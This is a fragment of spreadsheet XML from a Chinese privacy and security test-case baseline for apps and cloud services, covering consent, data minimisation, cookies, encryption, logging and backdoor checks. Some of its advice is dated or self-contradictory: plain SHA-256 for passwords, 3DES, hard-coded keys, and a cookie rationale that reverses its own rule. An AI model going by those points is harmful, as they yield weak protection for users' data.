    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>V1.0</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>云业务安全测试基线用例集</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>舒超、张悦</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>辜顺利、吴晓伟、马守亮、赵德志</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>预置条件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>测试步骤</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>预期结果</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>备注</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>设计描述</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>测试用例名称</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>测试用例编号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>测试用例级别</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>测试用例类型</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>测试结果</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>pass</t>
  </si>
  <si>
    <t>评审人</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>V1.1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>根据《消费者BG隐私设计规范V1.0》和《隐私保护规范-V_1_0》修改01.01.02 隐私保护，修改项：去除冗余用例，按规范进行用例分类、用例描述优化</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>张悦</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>舒超、马守亮</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APK_SECR_01010201_001</t>
  </si>
  <si>
    <t>'001 系统或特性的默认设置应保护隐私</t>
  </si>
  <si>
    <t>'1、产品有个人数据功能</t>
  </si>
  <si>
    <t>'1、产品的默认设置是否对隐私进行保护，不需要用户去做一些额外操作才能达到保护隐私的目的</t>
  </si>
  <si>
    <t>'1、涉及隐私的处理如果处于非安全状态，可能导致用户隐私的泄露或造成其他损失。产品的默认设置应对隐私进行保护，不需要用户去做一些额外操作才能达到保护隐私的目的</t>
  </si>
  <si>
    <t>APK_SECR_01010201_002</t>
  </si>
  <si>
    <t>'002 个人数据处理时，须遵守最小化原则</t>
  </si>
  <si>
    <t>'1、产品涉及个人数据功能</t>
  </si>
  <si>
    <t>'1、产品是否处理、使用了非业务所必需的个人数据，如果使用了容易引发用户的质疑和投诉，同时也违背了个人数据保护法中的最小限度原则</t>
  </si>
  <si>
    <t>'1、如果产品处理、使用了非业务所必需的个人数据，容易引发用户的质疑和投诉，同时也违背了个人数据保护法中的最小限度原则。因此产品应只处理业务所必需的个人数据。对于业务可选的个人数据不处理，或者默认不处理并提供开关控制，在征得最终用户同意并确认后才处理；尽可能选择不需要处理个人数据，又可满足业务需求的替代方案。</t>
  </si>
  <si>
    <t>APK_SECR_01010201_003</t>
  </si>
  <si>
    <t>APK_SECR_01010201_004</t>
  </si>
  <si>
    <t>'004 严格限制收集、访问、使用儿童的个人数据</t>
  </si>
  <si>
    <t>'1、产品涉及儿童功能</t>
  </si>
  <si>
    <t>'1、产品专门针对儿童、或者产品收集用户年龄从而可以识别到是在收集儿童的个人数据，是否结合目标市场国家的法律，专门分析儿童个人数据保护的问题</t>
  </si>
  <si>
    <t>'1、儿童对个人数据泄漏或者收集、滥用个人数据所带来的后果，缺乏判断能力。法律对处理未成年个人数据也有更严格的要求。因此如果产品专门针对儿童、或者产品收集用户年龄从而可以识别到是在收集儿童的个人数据，需要结合目标市场国家的法律，专门分析儿童个人数据保护的问题，具体设计方案须咨询消费者BG法务部和安全办公室</t>
  </si>
  <si>
    <t>APK_SECR_01010201_005</t>
  </si>
  <si>
    <t>'005 系统或应用配置变更时，须得到用户的同意</t>
  </si>
  <si>
    <t>'1、产品运行正常</t>
  </si>
  <si>
    <t>'1、对系统或应用的配置进行修改（用户主动发起的操作除外），属于修改用户隐私空间的行为，对于这类行为用户需要有知情权和控制权，是否给用户提示，并提供给用户同意和取消的选项，在用户同意后才能修改</t>
  </si>
  <si>
    <t>1、对系统或应用的配置进行修改（用户主动发起的操作除外），属于修改用户隐私空间的行为，对于这类行为用户需要有知情权和控制权，必须给用户提示，并提供给用户同意和取消的选项，在用户同意后才能修改。
  客户端与服务器自动协商的参数，不在此规则要求范围内。云业务服务器的配置如果不涉及个人数据的变更，不需要得到用户的同意</t>
  </si>
  <si>
    <t>APK_SECR_01010201_006</t>
  </si>
  <si>
    <t>'006 产品下载软件必须经过用户同意</t>
  </si>
  <si>
    <t>'1、产品具有下载功能</t>
  </si>
  <si>
    <t>1、下载软件到用户终端，涉及使用用户隐私空间，用户是否对于这类行为需要有知情权和控制权。
2、设计软件下载功能时，是否默认关闭下载功能，并提供用户手动开启下载的选项。另外，为了提高用户体验，可以提供是否允许自动下载的选项</t>
  </si>
  <si>
    <t>1、下载软件到用户终端，涉及使用用户隐私空间，用户对于这类行为需要有知情权和控制权。
2、设计软件下载功能时，需要默认关闭下载功能，并提供用户手动开启下载的选项。另外，为了提高用户体验，可以提供是否允许自动下载的选项。
3、针对没有UI界面的产品，不允许提供下载应用软件的功能，用于OTA升级的升级包除外</t>
  </si>
  <si>
    <t>APK_SECR_01010201_007</t>
  </si>
  <si>
    <t>'007 对用户系统或软件的升级，须得到用户的同意</t>
  </si>
  <si>
    <t>'1、对用户系统或软件进行升级，涉及修改用户隐私空间，用户对于这类行为是否有知情权和控制权。</t>
  </si>
  <si>
    <t>对用户系统或软件进行升级，涉及修改用户隐私空间，用户对于这类行为需要有知情权和控制权</t>
  </si>
  <si>
    <t>APK_SECR_01010201_008</t>
  </si>
  <si>
    <t>'008 原则上禁止对敏感个人数据进行采集和任何形式的处理</t>
  </si>
  <si>
    <t>1、系统运行正常
2、网络正常</t>
  </si>
  <si>
    <t>'1、敏感个人数据的泄露、滥用，可能导致对个人的歧视、迫害等，法律通常都会对此进行特殊保护。由于敏感个人数据的收集和使用风险很高，并且消费者BG目前暂无业务场景涉及敏感个人数据，因此禁止收集和处理。如有业务需要进行敏感个人数据收集和处理，是否已经到安全体系进行业务决策</t>
  </si>
  <si>
    <t>'1、业务没有用使用个人数据，如果使用的个人数据已经到法务部进行决策，</t>
  </si>
  <si>
    <t>APK_SECR_01010202_001</t>
  </si>
  <si>
    <t>APK_SECR_01010202_002</t>
  </si>
  <si>
    <t>APK_SECR_01010202_003</t>
  </si>
  <si>
    <t>'003 允许用户随时关闭对个人数据的收集和使用</t>
  </si>
  <si>
    <t>1、网络正常
2、系统运行正常</t>
  </si>
  <si>
    <t>1、对于应用收集和使用个人数据的行为，是否给用户选择权，是否允许用户选择禁止应用对个人数据的采集和使用。
2、对于必须要用到的个人数据，是否对用户不允许或者只允许采集部分数据所带来的后果进行说明。</t>
  </si>
  <si>
    <t>1、应用收集和使用个人数据的行为，要给用户选择权，允许用户选择禁止应用对个人数据的采集和使用。
2、对于必须要用到的个人数据，建议对用户不允许或者只允许采集部分数据所带来的后果进行说明。对于云业务，如果符合业界通用做法，则不作强制要求</t>
  </si>
  <si>
    <t>APK_SECR_01010202_004</t>
  </si>
  <si>
    <t>APK_SECR_01010202_005</t>
  </si>
  <si>
    <t>'005 禁止使用GET方式传输个人数据</t>
  </si>
  <si>
    <t>1、系统运行正常
2、有传输个人数据场景</t>
  </si>
  <si>
    <t>'1、提交个人数据到后台服务器，使用burpsuite的拦截http消息，查看是否使用get方式传输个人数据</t>
  </si>
  <si>
    <t>'1、禁止使用get方式传输个人数据</t>
  </si>
  <si>
    <t>APK_SECR_01010202_006</t>
  </si>
  <si>
    <t>'006 应用软件连接到互联网的要求</t>
  </si>
  <si>
    <t>APK_SECR_01010202_007</t>
  </si>
  <si>
    <t>'007 个人数据转移出当地网络的要求</t>
  </si>
  <si>
    <t>1、存在个人数据转移出当地网络的应用场景
2、获取产品资料</t>
  </si>
  <si>
    <t>1、必须采用独立的权限控制个人数据导出或转移操作，而普通用户、管理员用户都无法使用此功能。
2、个人数据导出操作要记录操作日志。
3、导出当地网络时要对个人数据进行过滤、匿名化处理。</t>
  </si>
  <si>
    <t>APK_SECR_01010202_008</t>
  </si>
  <si>
    <t>'008 个人数据用于营销或市场调查需经用户同意</t>
  </si>
  <si>
    <t>'1、若需要将个人数据用于营销、市场调查，数据控制者是否提供机制提前获取数据主体同意并提供随时撤销同意的机制</t>
  </si>
  <si>
    <t>'1、数据控制者须向数据主体提供随时撤销同意的机制。一旦数据主体表明不再想接收营销信息，则其之前对于营销的同意不再有效，要立即停止对其营销</t>
  </si>
  <si>
    <t>1) 数据控制者可以在数据主体账户的网页或是程序界面中提供勾选框供数据主体更改接受营销的方式或是取消接受营销。
2) 不能让数据主体经过复杂的方式才能拒绝接受营销，比如让数据主体填写表格或通过书面形式取消接受营销。在向数据主体发送营销信息的同时必须向数据主体提供可以取消接受营销信息的方式，并且取消的方式应该尽量和发送营销信息相符。利用邮件发送营销信息时，可以在邮件里告知一个有效的邮箱地址或是超链接，使得数据主体可以通过发送邮件到此邮箱或是点击链接来取消接受营销。</t>
  </si>
  <si>
    <t>APK_SECR_01010202_009</t>
  </si>
  <si>
    <t>'009 读取在数据主体系统上的Cookie前应提供获取数据主体同意及撤销的机制</t>
  </si>
  <si>
    <t>1、网络运行正常
2、产品运行正常</t>
  </si>
  <si>
    <t>'1、当网站在用户设备上设置Cookie来分析用户行为，如向用户营销、推送广告或是进行市场调查，而不是为用户提供基本服务时，是否在设置Cookie之前询问用户是否同意。在获得用户同意前，不得使用Cookie</t>
  </si>
  <si>
    <t>'1、在设置Cookie之前询问用户是否同意。在获得用户同意前，不得使用Cookie</t>
  </si>
  <si>
    <t>APK_SECR_01010203_001</t>
  </si>
  <si>
    <t>'001 对于用户录入的个人数据，需提供对数据的管理功能</t>
  </si>
  <si>
    <t>APK_SECR_01010203_002</t>
  </si>
  <si>
    <t>'002 用户数据提供给第三方前必须获得用户授权</t>
  </si>
  <si>
    <t>APK_SECR_01010203_003</t>
  </si>
  <si>
    <t>'003 修改或删除个人数据时，需得到用户的同意</t>
  </si>
  <si>
    <t>'1、在对个人数据进行修改或删除时，是否让用户知情并得到用户的确认</t>
  </si>
  <si>
    <t>1、在没有经过用户同意的情况下，对用户所属设备的个人数据进行修改或删除，在法律上同样属于侵犯用户的隐私。因此，在对个人数据进行修改或删除时，必须让用户知情并得到用户的确认
确认的方式，不局限于实时弹框提示，事前进行授权也是可以的。另外，用户主动发起的操作（比如修改联系人），属于用户知情并可控的场景</t>
  </si>
  <si>
    <t>APK_SECR_01010203_004</t>
  </si>
  <si>
    <t>'004 用户对个人数据导出操作时，须给用户适当的提示信息</t>
  </si>
  <si>
    <t>'1、用户在导出个人数据时，是否提示用户导出文件中包含个人数据，用户需要妥善保护好导出的文件。</t>
  </si>
  <si>
    <t>'1、内部存储区或SD卡为公共存储区，导出到公共存储区的个人数据不受安全访问控制的保护。因此用户在导出个人数据时，须提示用户导出文件中包含个人数据，用户需要妥善保护好导出的文件。</t>
  </si>
  <si>
    <t>APK_SECR_01010203_005</t>
  </si>
  <si>
    <t>'005 产品须对本地存储的个人数据提供适当的安全保护机制，如认证、授权、加密、日志等</t>
  </si>
  <si>
    <t>1、敏感个人数据是否禁止明文存储在系统日志文件、代码、Cookie中（存储类软硬件产品除外，如硬盘，数据库等）
2、操作人员访问个人数据之前是否对其身份及权限进行验证
3、产品对于个人数据的访问控制策略是否满足不同职位职能的权限要求，并可以取消操作人员的访问权限
4、数据主体的银行卡号在存储前是否采用安全加密机制进行加密，禁止存储CVV2
5、（可选）具有个人数据导出功能的产品，导出时是否提醒操作人员导出的数据中包含个人数据</t>
  </si>
  <si>
    <t>APK_SECR_01010203_006</t>
  </si>
  <si>
    <t>'006 对个人数据的访问须提供认证、访问控制等安全保护机制</t>
  </si>
  <si>
    <t>'1、个人数据访问是否有保护机制，主要包括身份认证和访问控制。身份认证（如用户名、密码）限定只有经过认证的用户才能访问数据，可应用于多用户场景；访问控制（如权限控制）可应用于对应用程序的限制</t>
  </si>
  <si>
    <t>1、个人数据访问的保护机制，主要包括身份认证和访问控制。身份认证（如用户名、密码）限定只有经过认证的用户才能访问数据，可应用于多用户场景；访问控制（如权限控制）可应用于对应用程序的限制。
不同的个人数据，所采取的保护措施可以不同。
- 电话本、短信、通话记录等，可以使用基本的访问控制机制（如进程间不能互相访问数据），保证数据不被其他应用随意访问。
- 系统关键配置文件、NV数据等，也要采用访问控制机制，保证仅有指定的进程可以访问。
- 文件类（图片、视频、文档）一般存储在公共存储，可以不提供保护措施。</t>
  </si>
  <si>
    <t>APK_SECR_01010203_007</t>
  </si>
  <si>
    <t>'007 涉及个人数据的接口，需提供安全保护机制（如：认证、权限控制等）</t>
  </si>
  <si>
    <t>涉及个人数据的接口，比如IMSI读取接口，通话、录音、拍照、收发短信等功能接口，是否提供安全保护机制</t>
  </si>
  <si>
    <t>涉及个人数据的接口，比如IMSI读取接口，通话、录音、拍照、收发短信等功能接口，必须提供安全保护机制，否则，恶意软件可以通过这些接口获取用户隐私或干涉用户通信自由。
接口的保护机制，主要包括权限控制和认证机制。对于提供给应用程序的调用的接口，可以使用权限控制机制，应用程序调用该接口前申请相关权限即可；对于用于管理的接口（如通过PC连接），建议使用认证机制，如密码认证。</t>
  </si>
  <si>
    <t>APK_SECR_01010203_008</t>
  </si>
  <si>
    <t>'008 应用调用涉及个人数据的接口时，须得到用户的确认</t>
  </si>
  <si>
    <t>'1、对于涉及个人数据的接口，调用时是否告知用户，是否未经过用户允许访问用户隐私或干涉用户通信自由的行为。</t>
  </si>
  <si>
    <t>1、对于涉及个人数据的接口，如果调用时用户不知情，会被认为是未经过用户允许访问用户隐私或干涉用户通信自由的行为。
因此，应用在调用涉及个人数据的接口时，必须得到用户的确认（如弹出提示框）。用户主动发起的行为，属于经过用户确认的场景，但是需要明确告知用户相关信息，如："在线音乐"在名称上已经表明了需要使用联网功能</t>
  </si>
  <si>
    <t>APK_SECR_01010203_009</t>
  </si>
  <si>
    <t>'009 个人数据进行远程传输时，需使用安全传输通道或加密后传输</t>
  </si>
  <si>
    <t>'1、网络运行正常</t>
  </si>
  <si>
    <t>'1、对用户的个人数据传输是否使用了安全的传输方式</t>
  </si>
  <si>
    <t>个人数据在远程传输时，可能会受到来自公网的恶意攻击，从而导致个人数据泄露。因此，对个人数据远程传输的场景进行设计时，需要使用安全传输通道或加密后再传输。按照标准协议传输的报文头中包含IP、MAC地址等数据时，不在该规则要求内。
2）对于图片、视频等大文件的传输，如果使用安全传输通道或加密后传输，效率比较低，可以在设计时考虑提供给用户安全传输的选项，让用户自己在效率和安全性之间做选择。
3）使用安全传输通道时（如https），需要保证协商的加密算法是安全的，如使用AES。
4）使用加密后传输的方式，需要采用非对称算法，如RSA，但该算法只适用于小数据加密。
5）远程传输指数据离开设备经过公网或非信任网络进行传输的过程，蓝牙、NFC、红外等近距离传输不属于远程传输，启用了安全协议（如WPA2）的WLAN的内部传输，也可不作为远程传输要求。</t>
  </si>
  <si>
    <t>APK_SECR_01010203_010</t>
  </si>
  <si>
    <t>'010 在应用的帮助或使用说明中告知用户如何管理个人数据</t>
  </si>
  <si>
    <t>'1、用申请了哪些隐私相关权限，以及用户可以对应用使用到的个人数据进行哪些管理操作，是否都在应用的帮助或使用说明中进行详细的介绍</t>
  </si>
  <si>
    <t>'1、应用申请了哪些隐私相关权限，以及用户可以对应用使用到的个人数据进行哪些管理操作，比如如何关闭对个人数据的收集、如何清除个人数据等，都可以在应用的帮助或使用说明中进行详细的介绍</t>
  </si>
  <si>
    <t>APK_SECR_01010203_011</t>
  </si>
  <si>
    <t>'011 出于定位问题目的，如需将个人数据上报服务器，应提供对其中包含的个人数据进行过滤或匿名化处理的机制或指导</t>
  </si>
  <si>
    <t>1、数据处理者出于定位问题目的，是否在得到客户（如运营商或企业）授权许可后，才可以将个人数据导出客户网络，
2、是否对其中的个人数据进行过滤或匿名化处理（如单向散列、截短、替换等）</t>
  </si>
  <si>
    <t>1、数据处理者出于定位问题目的，在得到客户（如运营商或企业）授权许可后，可以将个人数据导出客户网络，
2、出于保护个人数据的目的，应提供能力或指导对其中的个人数据进行过滤或匿名化处理（如单向散列、截短、替换等）</t>
  </si>
  <si>
    <t>APK_SECR_01010204_001</t>
  </si>
  <si>
    <t>'001 认证凭证数据（密码、口令、指纹等）须加密存储</t>
  </si>
  <si>
    <t>'1、认证凭证（密码、口令、指纹模板等）往往涉及用户的利益和隐私，所以需要检查是否对认证凭证进行加密存储。</t>
  </si>
  <si>
    <t>1、认证凭证（密码、口令、指纹模板等）往往涉及用户的利益和隐私，一旦泄露，会对用户造成重大损失（如网上银行交易密码），所以在进行设计时，必须对认证凭证进行加密存储。
对认证凭证进行加密时，必须选择安全且合适的加密算法：
- 针对不需要还原的场景（指不需要经过逆运算还原出加密前内容的场景，如登录），须使用单向不可逆加密算法，以保证加密后数据无法被破解。推荐使用SHA-256及以上算法。
- 针对需要还原的场景，须使用对称加密算法，推荐使用AES、3DES算法。其中，密钥强度要求128及以上，对于3DES，同时要求K1≠K2≠K3。
对于加密密钥的保存，原则上要求对密钥进行加密存储，但是，如果设备没有根密钥，会存在对密钥进行加密所使用的密钥无法加密保存的情况，所以允许使用硬编码密钥，建议对密钥分散存储，以提高安全性</t>
  </si>
  <si>
    <t>APK_SECR_01010204_002</t>
  </si>
  <si>
    <t>'002 日志中应避免打印个人数据</t>
  </si>
  <si>
    <t>1、检查是否在日志中明文打印相关个人数据
2、检查是否控制日志访问权限</t>
  </si>
  <si>
    <t>1、日志的作用一般是用于记录关键操作用于追溯，或者用于问题定位，如果日志中出现个人数据，会引起用户的质疑，带来不必要的麻烦。
因此，日志中应避免打印个人数据。
2、如果必须打印个人数据（如调试目的），必须对日志文件做访问权限控制，同时建议对个人数据进行匿名化处理，防止应用或个人通过日志获取用户的个人数据。
匿名化处理可以对原始数据进行哈希，并在哈希时加入盐值</t>
  </si>
  <si>
    <t>APK_SECR_01010204_003</t>
  </si>
  <si>
    <t>'003 避免将个人数据保存在公共存储区域</t>
  </si>
  <si>
    <t>'1、应用程序是否将个人数据保存在进程内部的存储区域，以防止其他应用访问这些数据</t>
  </si>
  <si>
    <t>1、对于应用来说，能够访问的存储区域主要有应用所在进程内部的存储区以及公共存储区（SD卡）。一般来说，应用程序应该将运行数据保存在进程内部的存储区域，以防止其他应用访问这些数据。
但是对于图片、视频等媒体文件，由于文件较大，允许保存在公共存储区
2、对于高安全要求的数据（如：DRM），可以保存在安全文件系统SFS中（SFS一般在芯片系统中提供）；如果数据涉及防篡改要求，可以保存在RPMB分区</t>
  </si>
  <si>
    <t>APK_SECR_01010205_001</t>
  </si>
  <si>
    <t>'001 必须提供机制或指导来删除或匿名化超过存留期的个人数据</t>
  </si>
  <si>
    <t>1、系统运行下正常
2、有预留用户个人数据功能</t>
  </si>
  <si>
    <t>'1、对预留和用户个人数据是否提供机制或指导用来删除和匿名化个人数据</t>
  </si>
  <si>
    <t>'1、对于数据控制者和处理者，必须提供机制或指导来删除或匿名化超过存留期的个人数据</t>
  </si>
  <si>
    <t>APK_SECR_01010205_002</t>
  </si>
  <si>
    <t>'002 必须提供存储的个人数据进行安全销毁的机制</t>
  </si>
  <si>
    <t>APK_SECR_01010205_003</t>
  </si>
  <si>
    <t>'003 数据主体撤销同意之后，产品必须禁止继续处理其相应个人数据</t>
  </si>
  <si>
    <t>1、系统运行正常
2、系统有收集用户个人数据功能</t>
  </si>
  <si>
    <t>'1、用户同意产品收集数据个人功能，用户撤销同意，查看产品是否还会收集用户个人数据</t>
  </si>
  <si>
    <t>'1、产品在用户撤销同意后不会再收集用户的个人数据</t>
  </si>
  <si>
    <t>APK_SECR_01010206_001</t>
  </si>
  <si>
    <t>'001 禁止在终端设备上提供监听功能或预留后门</t>
  </si>
  <si>
    <t>1、终端设备如果提供监听功能可能造成法律和政治上的危机，因此需要检查是否禁止终端设备提供监听功能
2、检可产品是否存在后门（如可绕过系统安全机制对系统或数据进行访问的功能）</t>
  </si>
  <si>
    <t>1、终端设备如果提供监听功能可能造成法律和政治上的危机，因此禁止终端设备提供监听功能。
2、产品若存在后门（如可绕过系统安全机制对系统或数据进行访问的功能），有可能被外部人员或内部恶意人员知晓进行私自操作，存在绕过鉴权进入系统的风险，受到用户质疑</t>
  </si>
  <si>
    <t>APK_SECR_01010206_002</t>
  </si>
  <si>
    <t>'002 如果产品允许提供通话录音功能，当Phone模块调用启动通话录音时，应在用户确认的情况下才能开启，并且必须通知通话双方</t>
  </si>
  <si>
    <t>'1、检查产品使用录音功能时是否知会到用户并在用户同意后才可以使用录音功能</t>
  </si>
  <si>
    <t>'1、通话录音功能可以录音通话双方的通话内容，如果设计不当，可以被用于非法监听，鉴于终端设备的特点，"嘀"一声即可认为达到告知用户的目的。产品是否允许提供通话录音功能，需遵循《终端产品网络安全红线解读CheckList》1.1.1章节的要求</t>
  </si>
  <si>
    <t>APK_SECR_01010206_003</t>
  </si>
  <si>
    <t>'003 在Phone模块通话过程中，禁止打开本机的录音功能</t>
  </si>
  <si>
    <t>'1、检查终端是否打开本地录音功能</t>
  </si>
  <si>
    <t>'1、Phone模块通话过程中打开本机的录音功能，可以对通话双方的通话内容录音，如果设计不当，可能侵犯用户隐私，为此我们与业界（如三星，苹果）的通用做法保持一致，在Phone模块通话过程中禁止打开录音机功能</t>
  </si>
  <si>
    <t>APK_SECR_01010206_004</t>
  </si>
  <si>
    <t>'004 如果产品允许提供拍照静音功能，必须提供拍照静音选项，默认不勾选（默认拍照有声音）</t>
  </si>
  <si>
    <t>1、网络运行正常
2、系统运行正常</t>
  </si>
  <si>
    <t>'1、检查终端的手机拍照功能是否默认有声音</t>
  </si>
  <si>
    <t>'1、静音拍照功能可以被用于偷拍。日本、韩国的法规要求销售的产品严禁提供拍照静音功能（要彻底禁止相关功能）。其他国家需要经法务评估，符合当地法律要求后可以提供拍照静音功能。</t>
  </si>
  <si>
    <t>APK_SECR_01010206_005</t>
  </si>
  <si>
    <t>'005 手机或Pad上的安全敏感应用须支持卸载</t>
  </si>
  <si>
    <t>'1、手机安装的应用是否可以被用户卸载</t>
  </si>
  <si>
    <t>涉及远程控制、远程管理、文件共享（如即可分享）等涉及敏感特性的应用属于安全敏感应用，用户可能因为安全原因对于手机或Pad上存在此类应用感到担心，按照用户选择/控制原则，用户应能对此类应用进行卸载</t>
  </si>
  <si>
    <t>APK_SECR_01010207_001</t>
  </si>
  <si>
    <t>'001 必须提供给用户修改其注册信息的功能</t>
  </si>
  <si>
    <t>'1、用户输入的注册信息是否可控制，用户是否可以修改自已的注册信息</t>
  </si>
  <si>
    <t>'1、用户注册信息必须为用户可控制，必须提供用户修改其注册信息的途径。特殊业务场景，如因业务需要不可修改，则在用户录入时必须告知用户</t>
  </si>
  <si>
    <t>APK_SECR_01010207_002</t>
  </si>
  <si>
    <t>'002 推送的内容（含广告）必须是符合政治、法律和宗教要求，并且推送频度不能干扰用户正常使用</t>
  </si>
  <si>
    <t>1、业务在主动向用户推送内容时是否内容不违背政治、法律、宗教要求，
2、推送内容是否过于频繁影响用户正常使用
3、是否提供用户选择开关，可以选择关闭推送消息</t>
  </si>
  <si>
    <t>'1、业务在主动向用户推送内容时必须确保内容不违背政治、法律、宗教要求，推送内容不能过于频繁影响用户正常使用。另外，应提供用户选择开关，可以选择关闭推送消息</t>
  </si>
  <si>
    <t>APK_SECR_01010207_003</t>
  </si>
  <si>
    <t>'003 禁止使用持久Cookie维持会话信息</t>
  </si>
  <si>
    <t>1、持久性Cookie被浏览器保存到设备上，关闭浏览器后再次打开，持久性Cookie是否仍然有效直到超过设定的过期时间
2、会话Cookie保存在内存而非设备上，其生命周期为浏览器会话期间，只要关闭浏览器窗口，Cookie是否就失效了</t>
  </si>
  <si>
    <t>'1、持久性Cookie被浏览器保存到设备上，关闭浏览器后再次打开，持久性Cookie仍然有效直到超过设定的过期时间；2、会话Cookie保存在内存而非设备上，其生命周期为浏览器会话期间，只要关闭浏览器窗口，Cookie就失效了，因此更容易造成用户数据泄露。如果用户选择记录登录状态，则可以使用持久Cookie。</t>
  </si>
  <si>
    <t>APK_SECR_01010207_004</t>
  </si>
  <si>
    <t>'004 禁止在Cookie中存放个人数据</t>
  </si>
  <si>
    <t>'1、检查cookie中是否含有个人数据</t>
  </si>
  <si>
    <t>'1、禁止在Cookie中存放个人数据，如果必须在Cookie中保存个人数据，则这些数据应加密。如果全程使用安全通道传输Cookie，则不作要求</t>
  </si>
  <si>
    <t>APK_SECR_01010207_005</t>
  </si>
  <si>
    <t>'005 用户注册的场景，提供给用户删除用户注册信息的选项</t>
  </si>
  <si>
    <t>'1、当用户不使用该帐号，检查是否提供用户删除自已注册信息的功能</t>
  </si>
  <si>
    <t>'1、当用户不使用该账号时，需提供给用户彻底删除注册信息的能力</t>
  </si>
  <si>
    <t>SER_SECR_01010201_001</t>
  </si>
  <si>
    <t>SER_SECR_01010201_002</t>
  </si>
  <si>
    <t>SER_SECR_01010201_003</t>
  </si>
  <si>
    <t>SER_SECR_01010201_004</t>
  </si>
  <si>
    <t>SER_SECR_01010201_005</t>
  </si>
  <si>
    <t>SER_SECR_01010201_006</t>
  </si>
  <si>
    <t>SER_SECR_01010201_007</t>
  </si>
  <si>
    <t>SER_SECR_01010201_008</t>
  </si>
  <si>
    <t>SER_SECR_01010202_001</t>
  </si>
  <si>
    <t>SER_SECR_01010202_002</t>
  </si>
  <si>
    <t>SER_SECR_01010202_003</t>
  </si>
  <si>
    <t>SER_SECR_01010202_004</t>
  </si>
  <si>
    <t>SER_SECR_01010202_005</t>
  </si>
  <si>
    <t>SER_SECR_01010202_006</t>
  </si>
  <si>
    <t>SER_SECR_01010202_007</t>
  </si>
  <si>
    <t>'007 个人数据转移出当地网络网络的要求</t>
  </si>
  <si>
    <t>SER_SECR_01010202_008</t>
  </si>
  <si>
    <t>SER_SECR_01010202_009</t>
  </si>
  <si>
    <t>SER_SECR_01010203_001</t>
  </si>
  <si>
    <t>SER_SECR_01010203_002</t>
  </si>
  <si>
    <t>SER_SECR_01010203_003</t>
  </si>
  <si>
    <t>SER_SECR_01010203_004</t>
  </si>
  <si>
    <t>SER_SECR_01010203_005</t>
  </si>
  <si>
    <t>SER_SECR_01010203_006</t>
  </si>
  <si>
    <t>SER_SECR_01010203_007</t>
  </si>
  <si>
    <t>SER_SECR_01010203_008</t>
  </si>
  <si>
    <t>SER_SECR_01010203_009</t>
  </si>
  <si>
    <t>SER_SECR_01010203_010</t>
  </si>
  <si>
    <t>SER_SECR_01010203_011</t>
  </si>
  <si>
    <t>SER_SECR_01010204_001</t>
  </si>
  <si>
    <t>SER_SECR_01010204_002</t>
  </si>
  <si>
    <t>SER_SECR_01010204_003</t>
  </si>
  <si>
    <t>SER_SECR_01010205_001</t>
  </si>
  <si>
    <t>SER_SECR_01010205_002</t>
  </si>
  <si>
    <t>SER_SECR_01010205_003</t>
  </si>
  <si>
    <t>SER_SECR_01010206_001</t>
  </si>
  <si>
    <t>SER_SECR_01010206_002</t>
  </si>
  <si>
    <t>SER_SECR_01010206_003</t>
  </si>
  <si>
    <t>SER_SECR_01010206_004</t>
  </si>
  <si>
    <t>SER_SECR_01010206_005</t>
  </si>
  <si>
    <t>SER_SECR_01010207_001</t>
  </si>
  <si>
    <t>SER_SECR_01010207_002</t>
  </si>
  <si>
    <t>SER_SECR_01010207_003</t>
  </si>
  <si>
    <t>SER_SECR_01010207_004</t>
  </si>
  <si>
    <t>SER_SECR_01010207_005</t>
  </si>
  <si>
    <t>1、涉及隐私的处理如果处于非安全状态，可能导致用户隐私的泄露或造成其他损失。产品的默认设置应对隐私进行保护，不需要用户去做一些额外操作才能达到保护隐私的目的</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、对用户系统或软件进行升级，涉及修改用户隐私空间，用户对于这类行为是否有知情权和控制权。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、敏感个人数据是否禁止明文存储在系统日志文件、代码、Cookie中（存储类软硬件产品除外，如硬盘，数据库等）
2、操作人员访问个人数据之前是否对其身份及权限进行验证
3、产品对于个人数据的访问控制策略是否满足不同职位职能的权限要求，并可以取消操作人员的访问权限
4、数据主体的银行卡号在存储前是否采用安全加密机制进行加密，禁止存储CVV2
5、（可选）具有个人数据导出功能的产品，导出时是否提醒操作人员导出的数据中包含个人数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.遍历客户端上所有非查询操作，提供其日志，保证每一个非查询操作有日志。
2.遍历接口中所有非查询操作，提供其日志，保证每一个非查询操作有日志。
3.访谈产品其他形式的非查询操作
注：建议和功能测试一起进行，遍历所有非查询类操作</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>人工测试：
1、检查资料中，是否对客户端提供的命令、参数、接口等做了说明
2、如果有隐藏的接口，检查资料中是否也对这些接口做了说明</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查看系统的设计文档、用户手册，检查系统存在可绕过系统安全机制（认证、权限控制、日志记录）对系统或数据进行访问的功能。
